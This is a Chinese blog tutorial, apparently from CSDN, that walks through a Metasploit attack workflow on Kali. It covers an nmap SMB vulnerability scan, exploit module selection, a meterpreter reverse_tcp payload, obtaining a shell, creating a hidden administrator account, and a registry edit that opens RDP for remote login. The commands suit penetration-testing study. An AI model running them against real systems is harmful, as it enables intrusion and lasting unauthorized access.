Kali——metasploit工具渗透测试流程

介绍:本文是展示在Kali中通过使用metasploit工具进行渗透测试的流程(也可以在windows系统中下载metasploit工具进行相关操作),工具详细教程可在Sangfor学习平台获取临时免费课程进行学习。

挂个链接:深信服产业教育中心

常规流程如下:

打开Metasploit工具界面:

1.首先对目标主机进行扫描寻找漏洞

nmap --script smb-vuln xx漏洞名.nse [目标机IP]

示例:

2.启动Metasploit

msfdb init && msfconsole

3.在msf终端下查找相关漏洞模块

search 漏洞名

示例:

4.若metasploit版本过低导致没有针对某操作系统的攻击代码,可以将攻击代码写入/usr/share

/Metasploit-framework/modules/exploits/xx系统/xx协议/xx漏洞名 中

示例:

5.写入攻击代码(视情况写/不写)后重启msf

exit

msfconsole

6.进入模块

use exploit/xx系统/xx协议/xx漏洞名 或者使用use 0 (注:进入模块前务必search一下相关漏洞模块)

7.查看该模块需要设置哪些参数(一般默认即可)

show options

8.设置相关参数

set LHOST IP address //设置本地(攻击者)主机IP地址

set RHOST IP address //设置远程(被攻击者)主机IP地址

set RPOST post //设置目的端口

set payload xx系统/meterpreter/reverse_tcp //设置payload(也称shellcode,攻击载荷,后面接系统目录路径)

9.查找可用目标(查找漏洞能够攻击的相关操作系统,可遍历也可查找自己需要的操作系统进行下一步操作)

show targets

示例:

10.找到相关ID后设置所攻击目标的操作系统类型:

set targets id xx

示例:

11.执行溢出漏洞攻击命令(exploit命令调用了payload)

run/exploit

执行成功后会显示系统路径目录的相关信息(因为调用了payload,而之前payload设置时选择了相关系统目录路径),最后再该相关信息下直接输入shell命令即可拿到目标主机的shell,

示例:

12.创建账号密码,获取的权限够大的话可以将该账号权限提升至管理员权限

比如创建一个cyz用户,密码为123456

net user cyz 123456 /add

提升管理员权限命令:net user cyz 123456 /add && net localgroup administrators cyz /add

13.开启远程登录端口:

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

14.检查是否开启3389端口:

netstat -ano

15.验证该主机是否可以正常远程登录:

重新打开一个kali命令行终端,输入rdesktop IP address:3389来远程登录目标主机

至此测试流程已完成(登不登的上就看情况了~)

示例:

  • 25
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值